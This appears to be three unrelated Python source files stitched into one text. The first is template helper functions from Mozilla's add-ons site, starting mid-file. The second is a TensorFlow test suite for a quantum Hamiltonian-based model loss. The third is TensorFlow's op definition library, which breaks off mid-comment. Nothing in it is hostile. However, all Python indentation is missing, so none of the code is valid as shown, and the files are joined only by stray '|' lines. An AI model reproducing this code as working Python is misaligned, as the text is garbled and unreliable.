def babel_date(date, format='medium'):
return _get_format().date(date, format=format) if date else ''
@register.function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@register.function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
@register.function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@register.filter
def paginator(pager):
return Paginator(pager).render()
@register.filter
def impala_paginator(pager):
t = get_env().get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@register.function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class Paginator(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = get_env().get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = get_language()
return Format(utils.get_locale_from_lang(lang))
@register.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
@register.filter
def currencyfmt(num, currency):
if num is None:
return ''
return _get_format().currency(decimal.Decimal(num), currency)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@register.function
@jinja2.contextfunction
def page_title(context, title):
title = force_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return format_html(u'{} :: {}', title, base_title)
@register.filter
def json(s):
return jsonlib.dumps(s)
@register.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@register.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@register.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@register.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@register.function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
from olympia.versions.models import License
if isinstance(license, (long, int)):
if license in PERSONA_LICENSES_IDS:
# Grab built-in license.
license = PERSONA_LICENSES_IDS[license]
else:
# Grab custom license.
license = License.objects.filter(id=license)
if not license.exists():
return ''
license = license[0]
elif not license:
return ''
if not getattr(license, 'builtin', True):
return ugettext('Custom License')
template = get_env().get_template('amo/license_link.html')
return jinja2.Markup(template.render({'license': license}))
@register.function
def field(field, label=None, **attrs):
if label is not None:
field.label = label
# HTML from Django is already escaped.
return jinja2.Markup(u'%s<p>%s%s</p>' %
(field.errors, field.label_tag(),
field.as_widget(attrs=attrs)))
@register.inclusion_tag('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
d = dict(context.items())
d.update(key=key, prefix=prefix)
return d
@register.filter
def timesince(time):
if not time:
return u''
ago = defaultfilters.timesince(time)
# L10n: relative time in the past, like '4 days ago'
return ugettext(u'{0} ago').format(ago)
@register.inclusion_tag('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
d = dict(context.items())
d.update(form=form)
return d
@register.filter
def is_choice_field(value):
try:
return isinstance(value.field.widget, CheckboxInput)
except AttributeError:
pass
@register.function
@jinja2.contextfunction
def cache_buster(context, url):
if 'BUILD_ID' in context:
build = context['BUILD_ID']
else:
if url.endswith('.js'):
build = context['BUILD_ID_JS']
elif url.endswith('.css'):
build = context['BUILD_ID_CSS']
else:
build = context['BUILD_ID_IMG']
return utils.urlparams(url, b=build)
@register.function
@jinja2.contextfunction
def media(context, url):
"""Get a MEDIA_URL link with a cache buster querystring."""
return urljoin(settings.MEDIA_URL, cache_buster(context, url))
@register.function
@jinja2.contextfunction
def static(context, url):
"""Get a STATIC_URL link with a cache buster querystring."""
return urljoin(settings.STATIC_URL, cache_buster(context, url))
@register.function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@register.function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
app = context['request'].APP.id
cat = str(category.id) if category else 'all'
return caching.cached(lambda: _side_nav(context, addon_type, category),
'side-nav-%s-%s-%s' % (app, addon_type, cat))
def _side_nav(context, addon_type, cat):
# Prevent helpers generating circular imports.
from olympia.addons.models import Category, Addon
request = context['request']
qs = Category.objects.filter(weight__gte=0)
if addon_type != amo.ADDON_PERSONA:
qs = qs.filter(application=request.APP.id)
sort_key = attrgetter('weight', 'name')
categories = sorted(qs.filter(type=addon_type), key=sort_key)
if cat:
base_url = cat.get_url_path()
else:
base_url = Addon.get_type_url(addon_type)
ctx = dict(request=request, base_url=base_url, categories=categories,
addon_type=addon_type, amo=amo)
template = get_env().get_template('amo/side_nav.html')
return jinja2.Markup(template.render(ctx))
@register.function
@jinja2.contextfunction
def site_nav(context):
app = context['request'].APP.id
return caching.cached(lambda: _site_nav(context), 'site-nav-%s' % app)
def _site_nav(context):
# Prevent helpers from generating circular imports.
from olympia.addons.models import Category
request = context['request']
def sorted_cats(qs):
return sorted(qs, key=attrgetter('weight', 'name'))
extensions = Category.objects.filter(
application=request.APP.id, weight__gte=0, type=amo.ADDON_EXTENSION)
personas = Category.objects.filter(weight__gte=0, type=amo.ADDON_PERSONA)
ctx = dict(request=request, amo=amo,
extensions=sorted_cats(extensions),
personas=sorted_cats(personas))
template = get_env().get_template('amo/site_nav.html')
return jinja2.Markup(template.render(ctx))
@register.function
def loc(s):
"""A noop function for strings that are not ready to be localized."""
return trim_whitespace(s)
@register.function
def site_event_type(type):
return amo.SITE_EVENT_CHOICES[type]
@register.function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
"""Wrapper for urlresolvers.remora_url"""
if lang is None:
_lang = context['LANG']
if _lang:
lang = to_locale(_lang).replace('_', '-')
if app is None:
try:
app = context['APP'].short
except (AttributeError, KeyError):
pass
return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@register.function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
try:
getattr(obj, attr)
return True
except ObjectDoesNotExist:
return False
@register.function
def no_results_amo():
# This prints a "No results found" message. That's all. Carry on.
t = get_env().get_template('amo/no_results.html').render()
return jinja2.Markup(t)
def _relative_to_absolute(url):
"""
Prepends relative URLs with STATIC_URL to turn those inline-able.
This method is intended to be used as a ``replace`` parameter of
``re.sub``.
"""
url = url.group(1).strip('"\'')
if not url.startswith(('data:', 'http:', 'https:', '//')):
url = url.replace('../../', settings.STATIC_URL)
return 'url(%s)' % url
@register.function
def inline_css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single style tag for each css file.
If we are not in debug mode, return a style that contains bundle-min.css.
Forces a regular css() call for external URLs (no inline allowed).
Extracted from jingo-minify and re-registered, see:
https://github.com/jsocol/jingo-minify/pull/41
Added: turns relative links to absolute ones using STATIC_URL.
"""
if debug is None:
debug = getattr(settings, 'DEBUG', False)
if debug:
items = [_get_compiled_css_url(i)
for i in settings.MINIFY_BUNDLES['css'][bundle]]
else:
items = ['css/%s-min.css' % bundle]
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
contents = []
for css in items:
if is_external(css):
return _build_html([css], '<link rel="stylesheet" media="%s" '
'href="%%s" />' % media)
with open(get_path(css), 'r') as f:
css_content = f.read()
css_parsed = re.sub(r'url\(([^)]*?)\)',
_relative_to_absolute,
css_content)
contents.append(css_parsed)
return _build_html(contents, '<style type="text/css" media="%s">%%s'
'</style>' % media)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_path(what):
"""Make it possible to override storage paths in settings.
By default, all storage paths are in the MEDIA_ROOT.
This is backwards compatible.
"""
default = os.path.join(settings.MEDIA_ROOT, what)
key = "{0}_PATH".format(what.upper())
return getattr(settings, key, default)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_url(what):
"""
Generate default media url, and make possible to override it from
settings.
"""
default = '%s%s/' % (settings.MEDIA_URL, what)
key = "{0}_URL".format(what.upper().replace('-', '_'))
return getattr(settings, key, default)
def id_to_path(pk):
"""
Generate a path from an id, to distribute folders in the file system.
1 => 1/1/1
12 => 2/12/12
123456 => 6/56/123456
"""
pk = unicode(pk)
path = [pk[-1]]
if len(pk) >= 2:
path.append(pk[-2:])
else:
path.append(pk)
path.append(pk)
return os.path.join(*path)
@register.filter
def hidden_field(field):
return field.as_widget(attrs={'style': 'display:none'})
|
|
# Copyright 2021 The QHBM Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for qhbmlib.inference.qmhl_loss"""
import functools
import math
import cirq
import sympy
import tensorflow as tf
import tensorflow_probability as tfp
from qhbmlib import data
from qhbmlib import inference
from qhbmlib import models
from tests import test_util
class QMHLTest(tf.test.TestCase):
"""Tests for the QMHL loss and gradients."""
def setUp(self):
"""Initializes test objects."""
super().setUp()
self.num_qubits_list = [1, 2]
self.tf_random_seed = 4
self.tf_random_seed_alt = 6
self.tfp_seed = tf.constant([3, 6], tf.int32)
# TODO(#190)
self.num_samples = int(1e6)
self.close_rtol = 2e-2
self.zero_atol = 2e-3
self.not_zero_atol = 2e-3
@test_util.eager_mode_toggle
def test_self_qmhl(self):
"""Confirms known value of the QMHL loss of a model against itself."""
num_layers = 1
qmhl_wrapper = tf.function(inference.qmhl)
for num_qubits in self.num_qubits_list:
qubits = cirq.GridQubit.rect(1, num_qubits)
data_h, data_infer = test_util.get_random_hamiltonian_and_inference(
qubits, num_layers, f"data_objects_{num_qubits}", self.num_samples)
model_h, model_infer = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"hamiltonian_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed)
# Set data equal to the model
data_h.set_weights(model_h.get_weights())
actual_data = data.QHBMData(data_infer)
# Trained loss is the entropy.
expected_loss = model_infer.e_inference.entropy()
# Since this is the optimum, derivatives should all be zero.
expected_loss_derivative = [
tf.zeros_like(v) for v in model_h.trainable_variables
]
with tf.GradientTape() as tape:
actual_loss = qmhl_wrapper(actual_data, model_infer)
actual_loss_derivative = tape.gradient(actual_loss,
model_h.trainable_variables)
self.assertAllClose(actual_loss, expected_loss, rtol=self.close_rtol)
self.assertAllClose(
actual_loss_derivative, expected_loss_derivative, atol=self.zero_atol)
@test_util.eager_mode_toggle
def test_hamiltonian_qmhl(self):
"""Tests derivatives of QMHL with respect to the model."""
# TODO(#171): Delta function seems generalizable.
def delta_qmhl(k, var, actual_data, model_qhbm, delta):
"""Calculates the qmhl loss with the kth entry of `var` perturbed."""
num_elts = tf.size(var)
old_value = var.read_value()
var.assign(old_value + delta * tf.one_hot(k, num_elts, 1.0, 0.0))
delta_loss = inference.qmhl(actual_data, model_qhbm)
var.assign(old_value)
return delta_loss
qmhl_wrapper = tf.function(inference.qmhl)
def qmhl_derivative(variables_list, actual_data, model_qhbm):
"""Approximately differentiates QMHL wih respect to the inputs."""
derivatives = []
for var in variables_list:
var_derivative_list = []
num_elts = tf.size(var) # Assumes variable is 1D
for n in range(num_elts):
this_derivative = test_util.approximate_derivative(
functools.partial(delta_qmhl, n, var, actual_data, model_qhbm))
var_derivative_list.append(this_derivative.numpy())
derivatives.append(tf.constant(var_derivative_list))
return derivatives
for num_qubits in self.num_qubits_list:
qubits = cirq.GridQubit.rect(1, num_qubits)
num_layers = 2
_, data_qhbm = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"data_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed,
ebm_seed=self.tfp_seed)
actual_data = data.QHBMData(data_qhbm)
model_h, model_qhbm = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"model_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed_alt,
ebm_seed=self.tfp_seed)
# Make sure variables are trainable
self.assertGreater(len(model_h.trainable_variables), 1)
with tf.GradientTape() as tape:
actual_loss = qmhl_wrapper(actual_data, model_qhbm)
actual_derivative = tape.gradient(actual_loss,
model_h.trainable_variables)
expected_derivative = qmhl_derivative(model_h.trainable_variables,
actual_data, model_qhbm)
# Changing model parameters is working if finite difference derivatives
# are non-zero. Also confirms that model_h and data_h are different.
tf.nest.map_structure(
lambda x: self.assertAllGreater(tf.abs(x), self.not_zero_atol),
expected_derivative)
self.assertAllClose(
actual_derivative, expected_derivative, rtol=self.close_rtol)
def test_loss_value_x_rot(self):
"""Confirms correct values for a single qubit X rotation QHBM.
We use a data state which is a Y rotation of an initially diagonal density
operator. The QHBM is a Bernoulli latent state with X rotation QNN.
See the colab notebook at the following link for derivations:
https://colab.research.google.com/drive/14987JCMju_8AVvvVoojwe6hA7Nlw-Dhe?usp=sharing
Since each qubit is independent, the loss is the sum over the individual
qubit losses, and the gradients are the the per-qubit gradients.
"""
ebm_const = 1.0
q_const = math.pi
for num_qubits in self.num_qubits_list:
# EBM
ebm_init = tf.keras.initializers.RandomUniform(
minval=ebm_const / 4, maxval=ebm_const, seed=self.tf_random_seed)
actual_energy = models.BernoulliEnergy(list(range(num_qubits)), ebm_init)
e_infer = inference.BernoulliEnergyInference(
actual_energy, self.num_samples, initial_seed=self.tfp_seed)
# QNN
qubits = cirq.GridQubit.rect(1, num_qubits)
r_symbols = [sympy.Symbol(f"phi_{n}") for n in range(num_qubits)]
r_circuit = cirq.Circuit(
cirq.rx(r_s)(q) for r_s, q in zip(r_symbols, qubits))
qnn_init = tf.keras.initializers.RandomUniform(
minval=q_const / 4, maxval=q_const, seed=self.tf_random_seed)
actual_circuit = models.DirectQuantumCircuit(r_circuit, qnn_init)
q_infer = inference.QuantumInference(actual_circuit)
qhbm_infer = inference.QHBM(e_infer, q_infer)
model = qhbm_infer.modular_hamiltonian
# Confirm qhbm_model QHBM
test_thetas = model.energy.trainable_variables[0]
test_phis = model.circuit.trainable_variables[0]
with tf.GradientTape() as log_partition_tape:
actual_log_partition = qhbm_infer.e_inference.log_partition()
expected_log_partition = tf.reduce_sum(
tf.math.log(2 * tf.math.cosh(test_thetas)))
self.assertAllClose(
actual_log_partition, expected_log_partition, rtol=self.close_rtol)
# Confirm qhbm_model modular Hamiltonian for 1 qubit case
if num_qubits == 1:
actual_dm = inference.density_matrix(model)
actual_log_dm = tf.linalg.logm(actual_dm)
actual_ktp = -actual_log_dm - tf.eye(
2, dtype=tf.complex64) * tf.cast(actual_log_partition, tf.complex64)
a = (test_thetas[0] * tf.math.cos(test_phis[0])).numpy() + 0j
b = 1j * (test_thetas[0] * tf.math.sin(test_phis[0])).numpy()
c = -1j * (test_thetas[0] * tf.math.sin(test_phis[0])).numpy()
d = -(test_thetas[0] * tf.math.cos(test_phis[0])).numpy() + 0j
expected_ktp = tf.constant([[a, b], [c, d]], dtype=tf.complex64)
self.assertAllClose(actual_ktp, expected_ktp, rtol=self.close_rtol)
# Build target data
alphas = tf.random.uniform([num_qubits], -q_const, q_const, tf.float32,
self.tf_random_seed)
y_rot = cirq.Circuit(
cirq.ry(r.numpy())(q) for r, q in zip(alphas, qubits))
data_circuit = models.DirectQuantumCircuit(y_rot)
data_q_infer = inference.QuantumInference(data_circuit)
data_probs = tf.random.uniform([num_qubits],
dtype=tf.float32,
seed=self.tf_random_seed)
data_samples = tfp.distributions.Bernoulli(
probs=1 - data_probs, dtype=tf.int8).sample(
self.num_samples, seed=self.tfp_seed)
# Load target data into a QuantumData class
class FixedData(data.QuantumData):
"""Contains a fixed quantum data set."""
def __init__(self, samples, q_infer):
"""Initializes a FixedData."""
self.samples = samples
self.q_infer = q_infer
def expectation(self, observable):
"""Averages over the fixed quantum data set."""
raw_expectations = self.q_infer.expectation(self.samples, observable)
return tf.math.reduce_mean(raw_expectations)
actual_data = FixedData(data_samples, data_q_infer)
qmhl_wrapper = tf.function(inference.qmhl)
with tf.GradientTape() as loss_tape:
actual_loss = qmhl_wrapper(actual_data, qhbm_infer)
# TODO(zaqqwerty): add way to use a log QHBM as observable on states
expected_expectation = tf.reduce_sum(test_thetas * (2 * data_probs - 1) *
tf.math.cos(alphas) *
tf.math.cos(test_phis))
with tf.GradientTape() as expectation_tape:
actual_expectation = actual_data.expectation(
qhbm_infer.modular_hamiltonian)
self.assertAllClose(actual_expectation, expected_expectation,
self.close_rtol)
expected_loss = expected_expectation + expected_log_partition
self.assertAllClose(actual_loss, expected_loss, rtol=self.close_rtol)
expected_log_partition_grad = tf.math.tanh(test_thetas)
actual_log_partition_grad = log_partition_tape.gradient(
actual_log_partition, test_thetas)
self.assertAllClose(
actual_log_partition_grad,
expected_log_partition_grad,
rtol=self.close_rtol)
expected_expectation_thetas_grad = (
2 * data_probs - 1) * tf.math.cos(alphas) * tf.math.cos(test_phis)
expected_expectation_phis_grad = -test_thetas * (
2 * data_probs - 1) * tf.math.cos(alphas) * tf.math.sin(test_phis)
(actual_expectation_thetas_grad,
actual_expectation_phis_grad) = expectation_tape.gradient(
actual_expectation, (test_thetas, test_phis))
self.assertAllClose(
actual_expectation_thetas_grad,
expected_expectation_thetas_grad,
rtol=self.close_rtol)
self.assertAllClose(
actual_expectation_phis_grad,
expected_expectation_phis_grad,
rtol=self.close_rtol)
actual_thetas_grads, actual_phis_grads = loss_tape.gradient(
actual_loss, (test_thetas, test_phis))
expected_thetas_grads = (
expected_expectation_thetas_grad + expected_log_partition_grad)
expected_phis_grads = expected_expectation_phis_grad
self.assertAllClose(
actual_thetas_grads, expected_thetas_grads, rtol=self.close_rtol)
self.assertAllClose(
actual_phis_grads, expected_phis_grads, rtol=self.close_rtol)
if __name__ == "__main__":
print("Running qmhl_loss_test.py ...")
tf.test.main()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class to hold a library of OpDefs and use it to create Brain operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import op_callbacks
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import tf_contextlib
def _Attr(op_def, name):
for attr in op_def.attr:
if attr.name == name:
return attr
raise TypeError("Inconsistent OpDef for '%s', missing attr '%s'" %
(op_def.name, name))
def _AttrValue(attr_protos, name):
if name in attr_protos:
return attr_protos[name]
raise TypeError("Inconsistent OpDef, missing attr '%s' from '%s'." %
(name, attr_protos))
def _SatisfiesTypeConstraint(dtype, attr_def, param_name):
if attr_def.HasField("allowed_values"):
allowed_list = attr_def.allowed_values.list.type
if dtype not in allowed_list:
raise TypeError(
"Value passed to parameter '%s' has DataType %s not in list of "
"allowed values: %s" %
(param_name, dtypes.as_dtype(dtype).name,
", ".join(dtypes.as_dtype(x).name for x in allowed_list)))
def _IsListParameter(arg):
if arg.number_attr:
return True
elif arg.type_list_attr:
return True
return False
def _NumTypeFields(arg):
num = 0
if arg.type != types_pb2.DT_INVALID: num += 1
if arg.type_attr: num += 1
if arg.type_list_attr: num += 1
return num
def _IsListValue(v):
return isinstance(v, (list, tuple))
def _Flatten(l):
"""Converts [1, 2, [3, 4], [5]] to [1, 2, 3, 4, 5]."""
# [1, 2, [3, 4], [5]] -> [[1], [2], [3, 4], [5]]
l_of_l = [x if _IsListValue(x) else [x] for x in l]
# [[1], [2], [3, 4], [5]] -> [1, 2, 3, 4, 5]
return [item for sublist in l_of_l for item in sublist]
def _Restructure(l, structure):
"""Returns the elements of list l structured according to the given structure.
A structure is represented by a list whose elements are either
`None` or a non-negative integer. `None` corresponds to a single
element in the output list, and an integer N corresponds to a nested
list of length N.
The function returns a data structure whose shape is given by
`structure`, and whose elements are taken from `l`. If `structure`
is a singleton, the function returns the single data structure
implied by the 0th element of `structure`. For example:
_Restructure(["foo", "bar", "baz", "qux"], [None, 2, None])
-> ["foo", ["bar", "baz"], "qux"]
_Restructure(["foo"], [None]) -> "foo"
_Restructure(["foo"], [1]) -> ["foo"]
_Restructure([], [0]) -> []
Args:
l: A list.
structure: A list whose elements are either `None` or a non-negative
integer.
Returns:
The elements of `l`, restructured according to `structure`. If
`structure` is a list of length 1, this function returns the
single data structure implied by `structure[0]`.
"""
result = []
current_index = 0
for element in structure:
if element is None:
result.append(l[current_index])
current_index += 1
else:
result.append(l[current_index:current_index+element])
current_index += element
if len(result) == 1:
return result[0]
else:
return tuple(result)
def _MakeFloat(v, arg_name):
if not isinstance(v, compat.real_types):
raise TypeError("Expected float for argument '%s' not %s." %
(arg_name, repr(v)))
return float(v)
def _MakeInt(v, arg_name):
if isinstance(v, six.string_types):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
try:
return int(v)
except (ValueError, TypeError):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
def _MakeStr(v, arg_name):
if not isinstance(v, compat.bytes_or_text_types):
raise TypeError("Expected string for argument '%s' not %s." %
(arg_name, repr(v)))
return compat.as_bytes(v) # Convert unicode strings to bytes.
def _MakeBool(v, arg_name):
if not isinstance(v, bool):
raise TypeError("Expected bool for argument '%s' not %s." %
(arg_name, repr(v)))
return v
def _MakeType(v, attr_def):
try:
v = dtypes.as_dtype(v).base_dtype
except TypeError:
raise TypeError("Expected DataType for argument '%s' not %s." %
(attr_def.name, repr(v)))
i = v.as_datatype_enum
_SatisfiesTypeConstraint(i, attr_def, param_name=attr_def.name)
return i
def _MakeShape(v, arg_name):
"""Convert v into a TensorShapeProto."""
# Args:
# v: A TensorShapeProto, a list of ints, or a tensor_shape.TensorShape.
# arg_name: String, for error messages.
# Returns:
# A TensorShapeProto.
if isinstance(v, tensor_shape_pb2.TensorShapeProto):
for d in v.dim:
if d.name:
logging.warning("Warning: TensorShapeProto with a named dimension: %s",
str(v))
break
return v
try:
return tensor_shape.as_shape(v).as_proto()
except TypeError as e:
raise TypeError("Error converting %s to a TensorShape: %s" % (arg_name, e))
except ValueError as e:
raise ValueError("Error converting %s to a TensorShape: %s" % (arg_name, e))
def _MakeTensor(v, arg_name):
"""Ensure v is a TensorProto."""
if isinstance(v, tensor_pb2.TensorProto):
return v
raise TypeError(
"Don't know how to convert %s to a TensorProto for argument '%s'" %
(repr(v), arg_name))
def _MakeFunc(v, arg_name):
"""Ensure v is a func."""
if isinstance(v, attr_value_pb2.NameAttrList):
return v
if isinstance(v, compat.bytes_or_text_types):
fn_attr = attr_value_pb2.NameAttrList(name=v)
elif hasattr(v, "add_to_graph"):
v.add_to_graph(ops.get_default_graph())
if hasattr(v, "_as_name_attr_list"):
fn_attr = v._as_name_attr_list # pylint: disable=protected-access
else:
fn_attr = attr_value_pb2.NameAttrList(name=v.name)
else:
raise TypeError("Don't know how to convert {} to a func for "
"argument {}".format(v, arg_name))
return fn_attr
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _MaybeColocateWith(inputs):
"""A context manager for (maybe) colocating with a list of input tensors.
Args:
inputs: A list of `Tensor` or `Operation` objects.
Returns:
A context manager.
"""
if not inputs:
yield
else:
# NOTE(mrry): The `ops.colocate_with()` function accepts only a single
# op or tensor, so we create one context manager per element in the list.
with ops.colocate_with(inputs[0]), _MaybeColocateWith(inputs[1:]):
yield
# pylint: enable=g-doc-return-or-yield
def apply_op(op_type_name, name=None, **keywords): # pylint: disable=invalid-name
"""Add a node invoking a registered Op to a graph.
Example usage:
# input1 and input2 can be Tensors or anything ops.convert_to_tensor()
# will convert to a Tensor.
op_def_library.apply_op("op", input1=input1, input2=input2)
# Can specify a node name.
op_def_library.apply_op("op", input1=input1, name="node_name")
# Must use keyword arguments, with the names specified in the OpDef.
op_def_library.apply_op("op", input_name=input, attr_name=attr)
All attrs must either be inferred from an input or specified.
(If inferred, the attr must not be specified.) If an attr has a default
value specified in the Op's OpDef, then you may pass None as the value
of that attr to get the default.
Args:
op_type_name: string. Must match the name field of a registered Op.
name: string. Optional name of the created op.
**keywords: input Tensor and attr arguments specified by name,
and optional parameters to pass when constructing the Operation.
Returns:
The Tensor(s) representing the output of the operation, or the Operation
itself if there are no outputs.
Raises:
RuntimeError: On some errors.
TypeError: On some errors.
ValueError: On some errors.
"""
output_structure, is_stateful, op, outputs = _apply_op_helper(
op_type_name, name, **keywords)
if output_structure:
res = _Restructure(ops.convert_n_to_tensor(outputs), output_structure)
if isinstance(res, list) and not res and is_stateful:
return op
else:
return res
else:
return op
def _apply_op_helper(op_type_name, name=None, **keywords): # pylint: disable=invalid-name
"""Implementation of apply_op that returns output_structure, op."""
op_def = op_def_registry.get(op_type_name)
if op_def is None:
raise RuntimeError("Unrecognized Op name " + op_type_name)
# Determine the graph context.
try:
# Need to flatten all the arguments into a list.
# pylint: disable=protected-access
g = ops._get_graph_from_inputs(_Flatten(keywords.values()))
# pylint: enable=protected-access
except AssertionError as e:
raise RuntimeError(
"Cannot determine graph for Op '%s' due to: %s"
% (op_type_name, e.message))
# Default name if not specified.
if name is None:
name = op_type_name
# Check for deprecation
deprecation_version = op_def.deprecation.version
if deprecation_version:
producer = g.graph_def_versions.producer
if producer >= deprecation_version:
raise NotImplementedError(
("Op %s is not available in GraphDef version %d. "
"It has been removed in version %d. %s.") %
(op_type_name, producer, deprecation_version,
op_def.deprecation.explanation))
# Fill in the list of default types for all "type" attrs. This
# will be used to choose a preferred dtype to convert to in the
# absence of input type information.
#
# TODO(b/31302892): Currently the defaults don't work in the right
# way if you have two inputs, one of whose type resolution depends
# on the other. Handling this will require restructuring this code
# significantly.
default_type_attr_map = {}
for attr_def in op_def.attr:
if attr_def.type != "type":
continue
key = attr_def.name
if attr_def.HasField("default_value"):
default_type_attr_map[key] = dtypes.as_dtype(
attr_def.default_value.type)
# Requires that op_def has passed validation (using the C++
# ValidateOpDef() from ../framework/op_def_util.h).
attrs = {}
inputs = []
input_types = []
with g.as_default(), ops.name_scope(name) as scope:
# Perform input type inference
inferred_from = {}
for input_arg in op_def.input_arg:
input_name = input_arg.name
if input_name in keywords:
values = keywords.pop(input_name)
elif input_name + "_" in keywords:
# Handle the case where the name is a keyword or built-in
# for Python so we use the name + _ instead.
input_name += "_"
values = keywords.pop(input_name)
else:
raise TypeError("No argument for input " + input_name)
# Goals:
# * Convert values to Tensors if it contains constants.
# * Verify that values is a list if that matches the input_arg's
# type.
# * If the input_arg's type is determined by attrs, either set
# those attrs and validate those attr values are legal (if
# they have not yet been set) or validate the input matches
# the type indicated by the attrs (if they have already been
# inferred via an earlier input).
# * If the input_arg has an explicit type, make sure the input
# conforms.
if _IsListParameter(input_arg):
if not _IsListValue(values):
raise TypeError(
"Expected list for '%s' argument to '%s' Op, not %s." %
(input_name, op_type_name, values))
# In cases where we expect all elements of the list to have the
